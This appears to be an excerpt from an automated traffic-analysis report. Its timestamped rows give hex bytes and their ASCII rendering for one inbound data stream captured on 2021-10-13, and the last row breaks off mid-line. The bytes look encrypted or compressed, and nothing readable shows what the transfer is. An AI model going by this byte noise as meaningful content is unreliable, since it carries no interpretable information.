2021-10-13 13:51:48 UTC	254	IN	Data Raw: fa bc d4 f8 4a 75 28 36 c2 3a 5a 51 1d 31 48 08 3d c0 62 3c 9e 87 58 3c 80 c6 8c 43 8b 97 81 5d 79 d7 d1 04 7e d5 54 e9 97 7f ec 29 fd f9 81 4b 2b ed bf f9 f0 ca f8 7b 8b d5 a0 1a c0 69 04 d2 2c 19 45 89 85 b2 62 d2 35 e2 3a 14 c2 20 ff 3c dd b4 26 9f 32 fc b7 35 63 4b c3 b1 ca 5f ba dc dc 89 f4 4c 29 25 6b 26 a2 02 ca e1 57 14 43 52 8a 81 76 f6 e2 30 c3 bc f5 3e 65 4f bf 47 f9 95 d0 59 dd e0 fc e3 be 17 70 c9 89 a4 d6 10 e4 5c 69 09 8b a0 d0 05 39 fa e6 a2 93 80 66 ef 97 93 f7 09 1b 1a cb 41 04 71 2a 8e 6e 88 95 3c 34 54 ff 45 b0 6e 41 49 e8 87 d2 65 36 0c 26 62 69 24 c1 1f b7 ed 04 24 69 cc aa 1d b6 84 9c 85 1c f2 5a be 20 5a 67 ca 84 49 e3 50 60 4d e5 fd aa c7 8f 2a 5a ab 23 6c b7 6b 25 92 77 3e 11 9e 18 45 54 58 69 14 fc a6 61 eb 9b a5 ff 30 dd d8 0e Data Ascii: Ju(6:ZQ1H=b<X<C]y~T)K+{i,Eb5: <&25cK_L)%k&WCRv0>eOGYp\i9fAqn<4TEnAIe6&bi$$iZ ZgIP`MZ#lk%w>ETXia0
2021-10-13 13:51:48 UTC	255	IN	Data Raw: 61 e0 0e 5b 7f 19 86 13 19 2e a4 87 23 48 04 ab d5 47 a4 9c 15 1d b1 ac f9 de d7 66 27 b2 43 f9 89 ec a4 e5 22 6a af c8 a1 57 c2 ad 29 ce e2 20 48 b2 c7 a9 36 6c c7 9a fe a2 93 cb 6e 19 31 33 a2 1a f0 2b 56 03 c7 e9 7a dd 6c ea c1 f5 fb f2 f0 7b fc 38 42 19 97 27 c5 82 f0 bc a6 2c b7 a4 58 5c 11 4e a8 5c cf 61 d2 9e 3b 13 b2 02 e7 5f fe 2b 76 c6 b9 38 5b d5 e9 71 cf f6 bd 49 08 12 b0 cb 8a 3c b5 f2 ac c5 62 af b7 dc de 73 4a 4f 32 a3 06 7a ad 5b 8f ca 1b 29 ab e7 f4 fc ef c4 99 dc 64 8b a3 c1 42 f5 a1 e3 c8 1c e2 1f 33 dc 0b f8 6c 55 f4 b3 c7 6a b9 f0 e1 b7 3a f3 aa 38 88 09 85 22 a2 be 1e 4b 28 c8 72 55 ee 6b fd c3 86 f4 61 a6 f2 c1 91 bc 78 bd 88 5f 52 ad 5e 46 40 93 94 66 38 aa e3 03 1d be 4e be 6b 32 a2 27 c1 c9 79 09 0c 88 c3 fc 3c 5c 23 e8 20 2c 8b Data Ascii: a[.#HGf'C"jW) H6ln13+Vzl{8B',X\N\a;_+v8[qI<bsJO2z[)dB3lUj:8"K(rUkax_R^F@f8Nk2'y<\# ,
2021-10-13 13:51:48 UTC	256	IN	Data Raw: bd bf 82 80 45 8f b5 28 14 36 ea 0b 97 f6 25 11 32 8f 79 c8 e0 b6 a7 c2 4b 52 9d e7 ee 62 ee 2f 0f ce 26 8f 22 61 4f 55 25 8b 2b ea f5 b5 8e 61 a3 8e bb 95 e1 a9 fe 16 5f 15 b4 09 09 85 b1 ab f1 5a 58 a4 9e 28 d8 c0 39 76 a9 c0 f8 53 b1 86 3d 8b 5a 13 46 b9 1f 68 20 f4 f4 a7 47 e8 d9 c4 0b a6 f9 ad 1b a9 17 e6 e3 d7 62 da be 59 32 6f ac 4a 59 73 7a 38 62 31 f1 09 f6 10 0d e3 64 c4 41 13 4a d2 89 c8 58 b6 8f 32 27 ed 9d c1 46 ad 34 92 33 80 bc 1b be 04 f6 00 cd 0f 9e 2c ef bf f1 73 8b a2 8f 14 c4 e3 da 45 ec 43 8a 83 b6 ef f3 3f 40 ca 5c 7e ef 70 23 b9 b9 33 69 e9 4a 0f 21 f4 ef 3f b0 2a 60 0b 05 2f 28 12 3d fe 5a 10 60 c0 ae dd 42 83 13 ce c8 8d b3 1f d5 24 ab 58 8a 76 9c e6 f2 77 82 7b a1 9e d7 6a 60 90 11 da ca 98 4d 70 9d 91 b8 67 0f 58 77 aa ca e7 76 Data Ascii: E(6%2yKRb/&"aOU%+a_ZX(9vS=ZFh GbY2oJYsz8b1dAJX2'F43,sEC?@\~p#3iJ!?*`/(=Z`B$Xvw{j`MpgXwv
2021-10-13 13:51:48 UTC	257	IN	Data Raw: 9c 8e 9b 5b 87 b6 16 d4 a4 1e e8 ad ea d7 71 d9 a1 6d a8 99 92 21 1b 75 03 8c 76 a2 59 f8 8c ba e3 8f 57 ed 8a f5 7b 86 9e c2 13 aa 51 1d 31 51 4e 20 c0 67 59 0f f2 0a 6a e3 38 87 78 60 2f be 34 ea 9c 8b 7c 93 83 bc b8 76 2a 1c 27 7c 0d 8e 7d 18 29 e4 72 98 1a 9b 05 f1 7a 0e 8f 3e 0a ac d3 96 e8 57 aa 2d 39 27 ad 7c b3 47 85 df 6c 1c 3f 50 70 b3 54 86 17 18 ea 84 ea 5a 4e 65 58 04 1d 24 75 0b 30 60 98 4e 15 28 a9 29 1e de 99 13 ff 32 96 5a 0f 77 70 b3 16 fa e1 77 3e 6a 6f 08 6e 2f 09 06 85 c8 e9 be 17 ac 2e c8 02 7b b9 64 cc 3a 09 8b 72 57 dd 7e b9 92 1b 2b 1f f0 58 90 e6 e0 c7 4b d5 4d 49 83 f4 6a 7b 91 77 c5 91 70 a7 a3 13 52 bb 41 c0 bd a0 fe db c7 cc 52 47 74 75 37 4d e1 6f b6 c0 24 6c ac 19 b6 4d 6c 85 1c 1b 98 f8 97 58 7e 34 7b c2 a6 fb bb fe 50 0c Data Ascii: [qm!uvYW{Q1QN gYj8x`/4\|v*'\|})rz>W-9'\|Gl?PpTZNeX$u0`N()2Zwpw>jon/.{d:rW~+XKMIj{wpRARGtu7Mo$lMlX~4{P
2021-10-13 13:51:48 UTC	258	IN	Data Raw: bb f3 42 36 b4 f7 fc a9 6c aa 93 7c 02 7a db fc f9 20 8f 3c 79 7f b8 4a e0 b3 91 d6 12 31 a7 af 55 aa 5e 1a ad 6c 6b 66 e8 96 4a 14 fa 6f a6 7f 94 bc a6 45 d8 cb 78 c9 80 83 17 0d c3 a3 18 65 f8 95 41 1f d7 99 8a 34 2c 6c de 98 3a aa a5 41 29 e4 fe 97 cd ae 6a 8c 5f 7d 0a 09 52 1d d3 5a 21 01 4b b1 f4 bb dd 3f b7 10 56 87 98 33 8f 29 0e 87 9f 27 2f d4 38 d1 09 2c d5 7c 43 e9 af f2 69 76 c2 0e 21 45 4e 96 e5 72 15 97 d3 75 f5 7a a0 66 fb 2d 60 4d ac a7 bd 74 7a b4 a2 f2 43 50 3d 23 23 ac 8a e0 26 c6 4c 8f 4e 4e b4 36 b3 7c a9 b1 9a 5f 34 7c 2f f4 56 34 12 f2 06 45 53 a9 be 9d 1e 89 96 6d 01 3c a2 a0 02 6d 50 15 08 6c 32 4f af d3 f1 95 d0 5b dd e0 2e ed be 17 7e 80 c5 d0 e9 e0 08 fd 6d 09 8b 7a de 11 ac f4 63 76 e1 32 65 32 93 e6 30 bd e0 ed 34 13 df 4f 6b Data Ascii: B6l\|z <yJ1U^lkfJoExeA4,l:A)j_}RZ!K?V3)'/8,\|Civ!ENruzf-`MtzCP=##&LNN6\|_4\|/V4ESm<mPl2O[.~mzcv2e204Ok
2021-10-13 13:51:48 UTC	259	IN	Data Raw: 1b 90 72 0d 51 f4 78 37 d2 d9 ce a6 3a c7 7d 8c 05 84 e9 2b 87 ba 1c a8 47 dc a5 34 ec 4e 38 6a 11 26 a5 b6 88 24 22 3e e5 6d b5 52 57 17 19 de 0e 92 12 20 ca 8e 59 12 df 1d 7f af 9a 1e 7f f6 22 4a 1a c3 09 dc 63 fb da 8b 0e d4 35 ac a2 93 49 21 e8 15 c6 54 b1 0a a8 cd 8d db 33 c8 1d 5a c9 cb 10 8b 92 a3 64 6b f2 93 58 eb 38 e9 ca 12 6e 9e ae f7 9f fb df 87 6e 5c 4b ae 16 71 42 12 44 24 3e b5 3e 69 ac b6 c9 f9 ee 7b 84 46 a7 e7 da 81 2f 71 75 fb 2b d4 b2 a6 19 d3 4e fc 23 11 99 62 13 e3 de 04 c3 f0 3c 7d 79 3e 73 05 52 09 8d b7 0c 29 5b 84 df 19 a5 95 bc f2 13 c1 04 9f 6d fb bd f8 48 f7 9d dc 20 cc b9 b3 74 01 e7 e0 0f fb 6e 41 f8 ce 3b 2e 5a b2 06 20 ba b4 ec 2b f6 de 1e f0 0d 99 39 2a 8a 48 ac 5b 66 ce e4 20 a4 e0 23 f5 e0 41 9b 88 74 00 75 4b cd fc 2a Data Ascii: rQx7:}+G4N8j&$">mRW Y"Jc5I!T3ZdkX8nn\KqBD$>>i{F/qu+N#b<}y>sR)[mH tnA;.Z +9H[f #AtuK
2021-10-13 13:51:48 UTC	261	IN	Data Raw: 9e c8 30 90 3a f3 e8 4e ea 23 07 c4 f4 6a f4 86 25 93 be 38 49 ae 13 db 7f 17 16 b6 bc 17 5d b3 cc 09 47 07 2c fe ce 18 11 c5 72 e2 42 f5 41 5e b9 96 c0 e4 fc db 56 2d 54 54 4d 80 43 e3 0b ba f8 33 31 72 d0 21 28 5d 15 5f 03 fa 6b a6 dd 68 33 19 26 00 f6 14 f0 34 d7 f7 d3 ec 02 ca ad b3 31 d6 5c 7b ba 14 e2 e1 c1 56 a0 1a f4 41 b5 07 a6 97 bc e9 02 95 29 21 a2 15 dc cd e6 ef a0 24 13 4b e0 c0 4b 9e dd e9 64 c7 5f ff 7f d7 ff f2 f1 a9 2a 6e 7e 28 cf 04 89 9c 15 cf e8 0c 7c de 4a 85 69 01 87 84 fe 0b d8 56 e8 b9 0f 22 42 3e c1 d7 1e 27 a6 c6 c0 20 35 28 7b db ad e1 bc 87 e3 5c 4d d7 56 90 da e0 fe 9a 54 c7 5a 4b 1a 0f 13 9a 42 68 8b a0 8d 96 26 a0 33 cf 7f e6 68 b4 80 63 ed 3e 30 07 b8 7b 60 7f ab 07 44 fd d6 65 64 a0 ed e7 ef cb 80 81 80 f3 48 1c a1 e4 77 Data Ascii: 0:N#j%8I]G,rBA^V-TTMC31r!(]_kh3&41\{VA)!$KKd_*n~(\|JiV"B>' 5({\MVTZKBh&3hc>0{`DedHw
2021-10-13 13:51:48 UTC	262	IN	Data Raw: ef 49 fc 63 85 1c 80 a7 76 f1 f8 57 aa 2a 0f 23 f0 6b 4b fb 8e 0d 47 5f 52 08 4d b5 d8 19 a5 08 f2 bb a3 42 ff 2a 08 03 a1 d5 b2 49 28 24 51 20 03 8d b8 57 b1 f4 83 11 5d 07 96 c0 3e 33 5c cd bf 8f 69 4a 29 3d 6c c2 b9 85 d4 fc 14 fa bc 8a 9e d3 75 9d 68 c9 96 75 5d cc 50 40 37 b7 b9 14 2b 16 ae a6 6f 88 d9 11 52 fd 47 ad 4e 75 6a a3 6d 51 f1 f0 31 b4 36 fd ae 51 f6 5f 94 52 1b 5f a9 e7 04 05 2c 4f 7f e2 9f bf 31 07 c1 d3 7b 37 87 42 dd 9f ac 1c 11 60 29 68 79 10 bb ec fd fd 7f 99 49 b2 bd e6 69 91 60 18 f7 dc e3 e3 a5 58 0e 2b dd 47 b2 1f ba e0 35 fb 48 5a 3a d0 2d 77 26 8f bd 21 6e eb 3f 1a 3a 7c 5c be 1b 48 ee 4c 46 20 fc 6e 7d 36 c6 60 b0 aa d7 9a 1f dd 26 89 0d 1e 95 3f c4 d0 20 ee 7e 27 7b 77 fb 7d 4f 81 78 aa 49 7f 1f 0b bd 7d 59 63 06 97 e5 be 6b Data Ascii: IcvW#kKG_RMBI($Q W]>3\iJ)=luhu]P@7+oRGNujmQ16Q_R_,O1{7B`)hyIi`X+G5HZ:-w&!n?:\|\HLF n}6`&? ~'{w}OxI}Yck
2021-10-13 13:51:48 UTC	263	IN	Data Raw: 06 9a 18 10 40 87 5c 7d 95 c1 d4 1e 97 e4 ec d2 91 41 6b 61 59 21 a6 36 60 e1 fb 4a 04 fe 6d 18 81 6e fe 7f 6f 51 f4 4e 33 d9 21 14 b9 9d ac 83 16 bb 1d e3 a2 69 d4 df d2 f5 72 93 5a 85 86 13 46 15 c7 ee da e1 29 3c 64 5f 03 5e 3e 57 94 56 94 56 4e bc d8 bb 22 a2 c0 90 06 f9 bf bc 36 d1 22 3c 98 6f 4e 5c a3 f5 68 d0 c1 dc d5 b8 e1 56 99 46 1d 55 da 88 ec 4f 3c 85 be af 9f ed 16 e5 54 68 7b 72 1d ae 28 43 80 75 91 58 eb ef f3 b5 7e 76 a5 eb e7 c8 9e cb 31 6c 6c a7 70 39 e8 9d bf 27 eb 84 ba e7 46 18 d7 bb 15 67 3e b3 8f e6 4d 53 ae ee a8 66 db 3b 67 81 d0 d7 fb 44 7d d7 1d 23 ce dd 96 57 59 f7 7b 71 e0 64 f3 78 8e 44 d0 7d fa 9a 47 35 fc db 11 ed 2d 88 f6 bb d6 45 82 91 ac 5c fb 72 d7 24 45 d5 ab b9 38 b2 11 78 73 79 21 2d d5 e9 78 39 97 07 71 d6 67 4c e3 Data Ascii: @\}AkaY!6`JmnoQN3!irZF)<d_^>WVVN"6"<oN\hVFUO<Th{r(CuX~v1llp9'Fg>MSf;gD}#WY{qdxD}G5-E\r$E8xsy!-x9qgL
2021-10-13 13:51:48 UTC	264	IN	Data Raw: f2 bb 32 0a 08 95 d0 f6 02 4d 94 91 34 fc 76 52 ca 00 25 85 88 d1 20 f5 da a3 7b 80 a3 79 e6 21 1e c9 19 a6 ce e8 a2 63 40 4d 95 ca 6c a9 a9 43 fa 02 8d dd 48 1f 25 14 5b fe 37 c2 9d 10 19 eb fb ca d9 da 69 2c 31 27 e5 86 70 4f 39 cf 2e 19 d7 f4 e7 6d 28 29 9e ae fc 02 db 40 82 23 e1 86 a6 50 e9 3d e2 d2 9b 5b 54 43 b7 86 b1 69 25 92 67 e2 48 aa 83 41 81 36 d1 8a b7 2b 5c 28 ab e6 43 f2 03 16 f2 79 49 e2 79 88 15 5b e2 e3 41 b2 07 27 4c f6 e5 68 aa 60 ee 24 df 73 da f2 31 e5 dc c2 c1 a1 bb df 19 df 77 43 9c 00 f1 75 f3 02 11 7a be 78 d0 de c1 37 9c 3c 88 ce 13 30 cd 2b de c7 3f 96 d0 13 03 fb 21 d0 0d b7 6e d1 3f f4 72 7e af 0d d6 25 4f 4e 18 02 ab 0e 16 63 64 f6 5c 67 51 2c cc 59 26 17 a4 04 fa 60 c4 21 74 e0 fe 04 ef a4 1c fa 4d c3 6a ad 58 62 bc 23 b5 Data Ascii: 2M4vR% {y!c@MlCH%[7i,1'pO9.m()@#P=[TCi%gHA6+\(CyIy[A'Lh`$s1wCuzx7<0+?!n?r~%ONcd\gQ,Y&`!tMjXb#
2021-10-13 13:51:48 UTC	266	IN	Data Raw: ec ff b2 2a 1f cd 73 f8 c7 2e de 46 19 7f 7a ba 1f d6 19 a9 db ec df a4 e2 ec ad 5b 66 1b 58 b9 3b f4 46 62 03 1a b8 8e 94 c4 f4 c1 d7 96 35 ec 2a 48 9c 42 f9 52 28 a1 8a 0c 74 63 d4 6e 56 ea 64 18 33 eb 79 f5 f1 a4 36 b9 9e a5 87 d5 02 45 bd 83 51 a9 e5 e2 5b 75 1e 8c f7 43 fe 68 29 99 b8 4d 6d c3 0c fc 15 b4 c0 9b 51 44 5f b9 ec 77 e4 3a 4a 26 31 77 fb b5 a1 dd 73 c3 5a 48 69 cc 08 01 b9 2e 4b ce 75 5b d8 b0 b9 c7 62 9d f1 70 b7 6a f5 68 7e 93 ab dc 5d fc 3c c7 70 4d 66 c5 01 2d 98 ff 13 4d d2 a5 c3 8a 55 6a 54 d5 10 ae 1c 7f 1f 6e eb a6 dc c3 19 76 4d a4 b2 7c b1 28 7b 86 06 5d 10 41 03 de 81 85 10 7e d1 48 64 9d 41 4e 35 09 a7 67 55 f8 53 93 28 98 26 1a a0 a0 5e 49 e0 dc ee 38 f4 2d a9 7b 36 90 a2 64 a6 b2 ee 7c 34 94 88 d0 7c c6 71 3b a2 a8 3f 28 25 Data Ascii: s.Fz[fX;Fb5HBR(tcnVd3y6EQ[uCh)MmQD_w:J&1wsZHi.Ku[bpjh~]<pMf-MUjTnvM\|({]A~HdAN5gUS(&^I8-{6d\|4\|q;?(%
2021-10-13 13:51:48 UTC	267	IN	Data Raw: d7 84 3a f8 3f 35 03 be 28 4d ce fd 58 56 91 0c 37 63 e7 3c e0 17 1a d6 c3 e0 84 e6 15 42 04 b4 4a 12 30 ac db a3 66 82 b4 d5 bb 02 43 70 b3 db 82 ce 8b 72 36 a9 14 ac 00 40 36 ce f9 eb 38 1c d4 af 60 b6 bc bc 56 58 d2 29 e2 0c bd 2b 5a c8 b3 a8 a2 dd d4 bb 9a 86 b9 30 8d 90 d1 25 d4 71 39 98 d6 a2 d7 24 1b 2a e0 ab a5 c1 81 13 2e f9 22 3c f6 32 6d e8 c2 82 a8 53 e1 1e 61 ba ab 69 4a 66 94 45 de 81 73 7b 99 a8 ca cc 59 fc d1 dd 14 85 64 2a 01 6a 91 06 f5 a0 a5 a3 f5 d2 ba 09 c3 71 dc ad 70 4e 2b 45 b3 b1 4c 7a f9 c5 80 ac a7 a4 9e de 92 fd 05 cd 2e 2c 81 1b b5 5c 7c 91 e7 a2 bb 2b 8e ee c5 16 25 b0 6c e8 d4 89 88 92 a4 28 6f 86 b6 42 c7 5e 3c 25 2f 02 86 31 ad de 78 4e a7 1b 5f a0 6e 99 aa 90 23 9a cc 25 f8 81 af 99 4c 75 25 39 28 72 37 96 97 5c 6c 73 95 Data Ascii: :?5(MXV7c<BJ0fCpr6@68`VX)+Z0%q9$."<2mSaiJfEs{YdjqpN+ELz.,\\|+%l(oB^<%/1xN_n#%Lu%9(r7\ls
2021-10-13 13:51:48 UTC	268	IN	Data Raw: 6e 1b 37 9a 5c d9 19 e8 de b7 5f 7d 9d a5 92 16 33 11 3d db ef 74 51 61 45 a6 c1 4c f4 82 bf 9e bc 47 99 fe 9d 30 b5 f7 3d e2 b7 57 5b 73 50 94 02 78 04 dc 2c 1f 18 7c 42 a2 c9 c0 94 48 0e 99 e9 27 ea 8e 48 3b a7 c3 48 5a dc c9 58 36 26 91 38 57 aa 86 88 7f 7d 09 96 90 94 ad cd 47 62 61 b5 f7 4c fc 36 90 36 c8 72 38 c3 e5 c2 ec cb db 01 6c d1 97 fb a2 89 e2 d4 da e6 cc 09 6b 89 73 f2 cd 32 3a ad 65 cd 7a 2e d3 eb fa 79 0c e9 e4 95 2a 47 8f 72 14 49 9d bc fc 86 ee 65 1d 9a 22 af b6 1f 64 f8 35 ed d1 cd 26 59 ec 75 6a 32 26 25 79 26 41 3f 3b a3 ae f2 b4 2d ab ac c6 ff 72 9d 63 85 81 f3 ce e4 6b 48 59 90 46 99 c3 67 8a d1 b7 d0 2f 38 75 54 88 30 c0 15 35 86 f0 43 a7 25 44 32 76 b6 82 be 34 bc a3 f4 c6 78 a0 ca 84 f6 ea 1f ed 57 d9 53 ce a2 3c 68 1b bb 01 63 Data Ascii: n7\_}3=tQaELG0=W[sPx,\|BH'H;HZX6&8W}GbaL66r8lks2:ez.y*GrIe"d5&Yuj2&%y&A?;-rckHYFg/8uT05C%D2v4xWS<hc
2021-10-13 13:51:48 UTC	270	IN	Data Raw: 4a 1f 39 ff 59 ff 43 91 97 c3 66 92 2d 10 e4 57 68 71 46 cc 08 fe bf c1 0c 85 47 ea bb 23 fd cc 9b 81 2e e1 22 a4 7f 76 55 d8 3c 23 92 95 73 ea 69 62 f4 6a 97 a3 66 c8 21 18 e4 59 65 e5 3d f2 52 31 76 d6 1b 61 bd ac b1 76 b9 e4 51 76 4f c3 54 8f 87 36 41 fd 97 a5 00 db 1b 89 e6 b1 aa bb ef 9e af 86 79 f0 bf fc f2 99 67 56 48 26 9e 31 de 0e 52 31 5e a7 fa cb e5 f7 4e 61 f0 d0 3f 07 97 9a e9 99 38 79 80 cf 95 cb 7d 08 0a 9f 4d 42 4d 55 3f a9 54 c0 6c 29 76 f5 02 21 23 99 b6 76 18 47 5f bb 87 2d 69 57 42 15 48 0d 5f 52 12 f7 5d b9 ba 85 52 16 35 b6 32 19 8c ef d1 6f 7f 22 da bd 62 f0 98 38 7b 37 a4 b1 a2 8e cd 72 8c 4f e6 0a 8d ad 8d ed 30 3d 76 d8 af 96 8b 35 29 6d 3c 2a 4a a4 ce b3 68 b1 f5 d7 ad 69 7a 47 f8 23 11 dc f2 f1 32 c6 54 98 be ed be c9 3f ad 1d Data Ascii: J9YCf-WhqFG#."vU<#sibjf!Ye=R1vavQvOT6AygVH&1R1^Na?8y}MBMU?Tl)v!#vG_-iWBH_R]R52o"b8{7rO0=v5)m<*JhizG#2T?
2021-10-13 13:51:48 UTC	271	IN	Data Raw: 07 aa 7b 56 96 46 4f 35 bc 25 2d 4c 20 31 f3 95 80 8a a1 5b 0b 48 f2 87 a5 ff da 2f aa 37 c0 2a e3 f0 ef f8 2c 64 72 4d e7 a3 6b 18 52 c2 3a c3 33 2d 9f 8a a0 4b 3a 7d 1a f6 f0 20 0b 11 8d 4d 49 ae 34 25 33 9a 6d 1b 61 d5 ba b0 7d ed 41 ce cd aa fe 6d 4c 2c c5 78 9d 6b ff da da cb 7c 49 7f b9 df ce 71 bb 4f 09 6b 34 99 a4 0a 87 37 bf f0 77 c4 c2 ab 38 df 9f e5 95 58 10 94 92 23 a6 79 8b 9f 75 eb 6a 19 91 f9 16 8c 11 ac c2 1f 70 ca ad ce ac 16 c6 85 c9 35 06 f9 41 7e 77 6f 95 55 0d fb 6a 5d 95 5d 37 d8 b9 9a c8 2d 0c 5a 8c 21 ab fe 47 cc d7 de 2b 5f 27 85 2b ec 37 8b 27 10 b9 9a 91 a5 23 28 3b 49 9e 49 5e 33 33 4e c6 6c bf 02 61 f2 59 4c c3 3b 3f 96 23 6c 29 c6 eb dc 9c 90 be 84 73 73 9c 36 b8 57 95 77 2a 4b 70 5f 77 05 57 c0 8f c7 b6 e0 6f 54 c4 2c d7 60 Data Ascii: {VFO5%-L 1[H/7,drMkR:3-K:} MI4%3ma}AmL,xk\|IqOk47w8X#yujp5A~woUj]]7-Z!G+_'+7'#(;II^33NlaYL;?#l)ss6WwKp_wWoT,`
2021-10-13 13:51:48 UTC	272	IN	Data Raw: 64 85 d2 69 07 be 51 84 c4 ed ee 9e 96 04 27 2e 33 f2 2e c6 6e 00 b4 bd 1a b1 b0 df c3 8a 15 8b 88 b5 e9 ad 9a 09 5d 77 bb 74 0b 30 b2 53 b5 6d 32 0b 82 c5 61 6b e5 f2 07 3f c9 70 22 fb d4 c2 e6 44 3a c2 3a 54 5e e1 5a 01 b8 c8 5b c1 16 61 b8 99 af dc 6c 0e 04 19 8e 06 3c b7 8f 85 04 7e e6 a2 95 40 43 95 3d 94 f6 30 93 4f 17 c8 cc 2c 0c b8 d4 7f c8 5c bd 5a a4 d4 1d 4b 77 26 9a 70 70 9a f6 38 68 c5 6a 2c cb 8a a4 fd e5 3e 0c be 3a 0e a2 99 25 8c 1c b6 db 4a 2c 61 ad bd 43 0c 0b 6e 99 92 b1 b6 7c 6e fb e7 d4 b4 48 fa 5f a2 9f 56 7f ea 31 b5 5b da d3 86 cf d8 f0 33 de 5d f9 54 68 ca 87 d7 f9 78 4f 69 89 c9 71 71 0b 1f 0f 93 8c 78 c2 fe 0d 52 23 6e f6 d1 70 dd 63 f1 7e dc dc 41 c9 12 7d c3 9e 12 75 c9 92 83 fd 94 1e 0c 82 72 68 67 d4 3a 9b 0d 1f fc 09 5a 65 Data Ascii: diQ'.3.n]wt0Sm2ak?p"D::T^Z[al<~@C=0O,\ZKw&pp8hj,>:%J,aCn\|nH_V1[3]ThxOiqqxR#npc~A}urhg:Ze
2021-10-13 13:51:48 UTC	273	IN	Data Raw: e2 4d 53 97 bc 71 ae 83 a3 91 7e c7 d8 d1 38 46 9f ac c0 c1 71 77 d9 f8 76 cf 70 6d f2 c0 f9 3e 45 82 f0 d5 66 7d 66 44 3a 8e ee 3a 66 2e f4 28 ce cf 05 00 e5 8c 31 ca 75 c7 72 9d ee b1 b7 6d 65 24 2f 4c a1 73 05 6f 3b 5d b7 70 55 a3 c7 78 ab c7 8f f5 8e 35 e4 67 59 25 5c 27 24 dd da 4c 1a 29 43 49 de 0b 1f 29 43 05 1b 07 42 47 cf 79 61 e2 a2 1c e4 cc 4b 8f 5b 10 b8 d7 a4 e4 a2 36 a3 5e f6 79 35 43 ab 3b 48 60 56 a5 15 b0 74 c0 15 34 71 54 8f ce c5 3d 79 7f 07 57 29 3e 6e 5d 25 38 a7 f2 51 75 30 1f c3 93 94 03 49 9b 4e 14 8e a9 e6 bf e0 bc 25 e9 85 99 10 c9 67 0e 99 a1 d4 93 98 17 52 ea d7 5d df df a6 2c a9 93 21 92 78 4a 21 81 5d d2 41 cf 06 7b 03 da 5d 7d 7e b5 54 77 9e a4 de 51 1d 2d 60 c9 e2 b4 10 57 e4 ba 59 3c 0b 3e 7b 9c 1c 12 c6 29 6f 5c 84 8c 3e Data Ascii: MSq~8Fqwvpm>Ef}fD::f.(1urme$/Lso;]pUx5gY%\'$L)CI)CBGyaK[6^y5C;H`Vt4qT=yW)>n]%8Qu0IN%gR],!xJ!]A{]}~TwQ-`WY<>{)o\>
2021-10-13 13:51:48 UTC	274	IN	Data Raw: d0 2d 6f a6 68 28 53 31 8f ae 7f cc ac c3 0b f3 9a e7 37 c5 fd b6 8f 18 ec 73 ba 42 f6 48 13 a1 99 55 07 27 d8 43 03 90 ac f1 11 bf 2e 9c ed f8 74 e7 c4 18 bb d2 af 07 fc e9 72 64 3b a1 15 ac 5b 78 83 3d 99 83 87 54 ee a8 1e 53 25 f8 7f f5 bf 86 58 ff 74 64 f6 fe 37 32 15 35 2f 92 59 2c 3a ed a0 44 5b 6e 90 33 a0 6b 3d 20 2d c6 ef 32 fe 7e 04 c3 80 ef c8 ae 48 cd a0 fa 90 e6 9c 6f 8e 55 a3 44 31 66 4e 49 20 e1 9a 8e 37 f5 a0 ee 8e 52 a4 66 a5 f1 18 ab 64 87 b9 e8 ca 6d d1 d4 e4 a0 02 b2 74 20 3b a5 1c 6f 4f fb ae 5b 10 51 13 f8 30 f5 77 78 a1 09 f2 7c b6 56 7c 0d 5c 03 ed ed 56 49 a9 11 50 e7 46 ea 27 76 4f 59 b8 aa 52 bd b9 e1 ba bf 75 38 cd 67 8e b6 5e 87 9b e1 f0 07 4a db eb 6f 3f 24 be 6d e9 4e 7f 96 21 2b d5 0d 0e 48 32 24 d5 ce b8 a4 69 13 c2 eb 31 Data Ascii: -oh(S17sBHU'C.trd;[x=TS%Xtd725/Y,:D[n3k= -2~HoUD1fNI 7Rfdmt ;oO[Q0wx\|V\|\VIPF'vOYRu8g^Jo?$mN!+H2$i1
2021-10-13 13:51:48 UTC	275	IN	Data Raw: fa 37 c7 6d f9 3c 61 b8 60 1c 19 85 b0 82 22 17 13 4f fa d6 34 18 1a 50 56 8b e9 52 23 6d 32 3c bf 22 63 92 2b ed 8e cc 40 85 23 2b 15 0c 26 15 2f 78 52 01 e9 dc 16 e9 6e fd f5 cb 9b 36 1f fc 8a 9e c2 a7 7b 7c ab 43 9f cf 08 5c ea 25 e4 07 42 20 f6 6a 62 50 a6 8f 49 9a 2a 8a 18 c5 f4 68 a3 0e 5e 63 9f 4e dc 68 da 2e b4 19 98 26 0c 6c 73 4f 38 f5 39 d7 ea 58 07 44 29 fa 3b 0d 6e a5 e9 62 b2 d2 c2 fe 58 e0 02 ed 68 51 ac 20 92 33 03 94 fa 97 6e f6 00 e1 7d c4 47 a8 41 0e 19 8b ad 15 52 bb 2f e5 e4 bc 80 58 0d 8d 3f 5c 2c e9 62 9e 03 82 fb 63 2c 9c cc 96 9d 85 d7 56 f4 28 3f 5c a1 84 7f 24 3b 7c 9d 8a 6a 6a ef ea 2f 5f 63 32 9a cb 6f b1 f9 a7 44 c5 aa ee b2 fc e3 f1 d1 c7 9c 3b 3e 57 18 17 4d 06 19 54 af 04 cd d6 16 4c 41 2c f6 4e 65 ae 97 ca 66 33 cf 59 d2 Data Ascii: 7m<a`"O4PVR#m2<"c+@#+&/xRn6{\|C\%B jbPI*h^cNh.&lsO89XD);nbXhQ 3n}GAR/X?\,bc,V(?\$;\|jj/_c2oD;>WMTLA,Nef3Y
2021-10-13 13:51:48 UTC	277	IN	Data Raw: 7b ec a1 be 6b b4 f3 2c 52 96 79 00 0b e8 e4 15 ab 93 21 f3 52 42 df 7e 37 ec 2c c5 3e 8f 00 da 5d 95 94 40 28 36 40 ee 89 d8 9b 19 4a 4c 22 28 a4 10 a5 fd 32 70 5c b7 89 c3 9d ac 7a c0 ed 98 7b 07 46 f7 eb 31 7b 37 ee aa 39 19 aa d1 e7 d2 8e 07 42 1e bd ba 0c 85 5f 0d 59 fd ac 7b ae c8 e8 ff fc 69 25 2e b8 47 9a 81 55 df 74 f8 9d 53 c4 88 4a 85 1c 65 09 4a 41 f6 5e f6 ad 9f af 00 72 97 ef 0d ee 67 10 ee 46 1e da 14 95 5d 77 7e 27 2c 27 b7 be 1f 08 6c 32 db 3a 07 08 ad a9 69 89 08 68 08 41 e8 fd 83 4f 31 2b ef 8c 9b 6d 09 8b 36 15 81 f9 79 e6 8f 18 cd 9a a5 44 03 a7 61 1b 14 cb 41 89 1c 60 58 91 77 46 92 21 6f 7e 1a 58 bb cf b0 d6 04 16 de 73 ce 02 4d 24 61 3e 4d e1 53 58 a0 bb 33 02 c8 9a b5 40 db 47 2c 5d 00 39 ce 59 23 d1 c2 0f 8a 